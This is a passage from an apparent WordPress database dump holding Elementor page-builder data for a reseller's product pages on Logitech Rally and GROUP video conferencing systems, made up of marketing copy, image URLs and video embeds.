conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd1e4d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"92a5761\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"c4d9848\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADVANCED MODULAR AUDIO<\\/h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound that\\u0092s natural, crisp, and highly intelligible. Logitech RightSound\\u0099\\u2122 enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a921491\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"3fa5585\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp.jpg\",\"id\":2911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58834df\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5c2d6f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"456e282\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-1.jpg\",\"id\":2912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"fc84764\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b27f55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f623216\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3614128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61805be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of technologies built into Rally that automate a better user experience. RightSight\\u2122 perfectly auto-frames participants no matter their distance from the lens. RightLight\\u2122 prioritizes faces over environment to render natural-looking skin tones while RightSound\\u0099\\u2122 enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings \\u2014 \\u0097automatically!<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7601a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d30db6c\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"612d913\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12cc4b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4df284a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-2.jpg\",\"id\":2913}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b51f998\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7afaa26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMART CABLING AND CONTENT SHARING<\\/h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b6a06a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f826d19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-3.jpg\",\"id\":2914}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2473dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"470dd3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b2bfdfa\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a54b538\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"a87eb99\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8ed1331\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SEE EVERYONE, PERFECTLY FRAMED<\\/h4><p>Logitech RightSight\\u0099 camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9238ce1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e400259\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LET THE SUNSHINE IN<\\/h4><p>Even in meeting rooms with bright windows, Logitech RightLight\\u0099 technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3cf6bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"628d3e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADAPTIVE PAN, TILT AND ZOOM<\\/h4><p>Pan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a14cdde\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af2bc65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FRONT OF ROOM AUDIO<\\/h4><p>Unlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'\\u0092s voice and video both come from the same place \\u0097 and never from behind you \\u2014 \\u0097 so conversations feel more natural and lifelike.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"92dbf40\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3b7da92\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b917f02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIONAL MOUNTING KIT<\\/h4><p>Add Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8f441a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c1a745e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>LOUD AND CLEAR<\\/h4><p>The Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af53cbc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"18b598e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>UP TO 7 MIC PODS<\\/h4><p>For rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7e4f1f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e7ae67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FLEXIBLE MIC POD CABLING<\\/h4><p>A more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a45d7e6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"722f670\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"61e2996\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5311,2909,'_wp_page_template','template-fullwidth.php'),(5312,2909,'_elementor_edit_mode','builder'),(5313,2909,'_elementor_template_type','post'),(5314,2909,'_elementor_data','[{\"id\":\"d56b4cd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a471602\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"455bf20\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Affordable video conferencing for mid to large-sized meeting rooms<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Crystal-clear audio for up to 20 participants<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b32e49\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"06b0dd9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cf1dd7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef73f1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"da02547\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fada155\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5d35ea7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"343b905\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/vOMW9wEaoqo\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"0cdde62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"09a199f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR LARGER ROOMS<\\/h3><p>GROUP, our video conferencing solution for rooms that seat 14\\u201320 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, it\\u2019s easier than ever to include everyone in the conversation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad5cd3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f81ce3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6cdee74\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PLUG-AND-PLAY SIMPLICITY<\\/h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and you\\u2019re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with Bluetooth\\u00ae wireless technology to the GROUP speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"664604d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b7f779\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group.jpg\",\"id\":2900}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"696dda5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"002c882\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0be4251\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-1.jpg\",\"id\":2901}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"428141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eba90b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-DEFINITION VIDEO<\\/h3><p>Bring meetings into focus with GROUP\\u2019s premium lens, 10x lossless zoom, and HD 1080p\\/30 performance. Perfectly frame presenters and whiteboards with pan\\/tilt control, and zoom in for detail and clarity. GROUP\\u2019s 90\\u00b0 field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9676476\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8f5bcba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"174c105\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>NATURAL-SOUNDING AUDIO<\\/h3><p>Everyone hears and can be heard with GROUP\\u2019s full-duplex speakerphone, which delivers sound that\\u2019s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc26c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f9d268f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-2.jpg\",\"id\":2902}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8c4f13\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"83ae89b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"32fffa1\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99a4e2b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"5968086\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"51b43f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SPEAKERPHONE WITH BLUETOOTH<\\/h4><p>Hear and be heard with life-like clarity. GROUP\\u2019s full-duplex speakerphone provides 360\\u00b0 coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m \\/ 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5b98fa4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c3150a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31efa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d36663\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT CONTROLS<\\/h4><p>GROUP\\u2019s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f572933\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c52992d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AVAILABLE EXPANSION MICS<\\/h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyone\\u2019s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"616c1d1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cea2e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c9754e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MUTE WITH CONFIDENCE<\\/h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUP\\u2019s LED status ring lights up red, a subtle yet obvious assurance that\\u2019s easily seen throughout the room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"542032b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ed52df\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CABLING MADE EASY<\\/h4><p>GROUP\\u2019s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m \\/ 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4ae168e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2371100\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FIELD UPGRADEABLE<\\/h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. It\\u2019s another reason why Logitech delivers the best value proposition in the industry.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1f3494\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"99173ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f1cfa7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5315,2909,'_elementor_version','0.4'),(5317,2000,'_oembed_540a44c7ae6932ac7375bd8b8b3bcff6','<iframe width=\"800\" height=\"450\" src=\"https://www.youtube.com/embed/vOMW9wEaoqo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(5318,2000,'_oembed_time_540a44c7ae6932ac7375bd8b8b3bcff6','1550127668'),(5320,2910,'_wp_page_template','template-fullwidth.php'),(5321,2910,'_elementor_edit_mode','builder'),(5322,2910,'_elementor_template_type','post'),(5323,2910,'_elementor_data','[{\"id\":\"d56b4cd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a471602\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"455bf20\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Affordable video conferencing for mid to large-sized meeting rooms<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Crystal-clear audio for up to 20 participants<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b32e49\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"06b0dd9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cf1dd7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef73f1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"da02547\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fada155\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5d35ea7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"343b905\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/vOMW9wEaoqo\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"0cdde62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"09a199f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR LARGER ROOMS<\\/h3><p>GROUP, our video conferencing solution for rooms that seat 14\\u201320 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, it\\u2019s easier than ever to include everyone in the conversation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad5cd3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f81ce3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6cdee74\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PLUG-AND-PLAY SIMPLICITY<\\/h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and you\\u2019re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with Bluetooth\\u00ae wireless technology to the GROUP speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"664604d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b7f779\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group.jpg\",\"id\":2900}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"696dda5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"002c882\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0be4251\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-1.jpg\",\"id\":2901}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"428141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eba90b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-DEFINITION VIDEO<\\/h3><p>Bring meetings into focus with GROUP\\u2019s premium lens, 10x lossless zoom, and HD 1080p\\/30 performance. Perfectly frame presenters and whiteboards with pan\\/tilt control, and zoom in for detail and clarity. GROUP\\u2019s 90\\u00b0 field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9676476\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8f5bcba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"174c105\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>NATURAL-SOUNDING AUDIO<\\/h3><p>Everyone hears and can be heard with GROUP\\u2019s full-duplex speakerphone, which delivers sound that\\u2019s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc26c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f9d268f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-2.jpg\",\"id\":2902}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8c4f13\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"83ae89b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"32fffa1\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL 